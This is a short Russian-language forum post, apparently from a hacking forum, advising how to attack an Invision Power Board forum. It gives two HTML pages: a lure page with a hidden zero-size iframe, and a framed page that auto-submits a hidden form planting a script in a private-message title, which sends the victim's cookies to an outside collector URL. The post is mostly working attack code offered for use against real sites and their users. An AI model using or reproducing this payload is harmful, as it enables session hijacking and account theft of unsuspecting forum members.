
20.02.2007, 00:19
|
|
Новичок
Регистрация: 24.05.2006
Сообщений: 13
С нами:
10507999
Репутация:
16
|
|
Лучше впаривать ссылку на страницу такого типа
Код HTML:
<html>
<body>
здесь любой контент
<iframe width=0 height=0 frameborder=0 src="frame.htm">
</body>
</html>
А все "подозрительные" действия совершать во фрейме
Код HTML:
<html>
<body>
<form name="xss" action="http://test1.ru/ipb217/index.php" method="post">
<input type="hidden" name="act" value="Msg">
<input type="hidden" name="CODE" value="04">
<input type="hidden" name="MODE" value="01">
<input type="hidden" name="msg_title" value='"><script>document.location.href="http://test2.ru/xss/s.php?"+document.cookie;</script>'>
<script language=javascript>xss.submit()</script>
</form>
</body>
</html>
Как на видео с ДЛ
|
|
|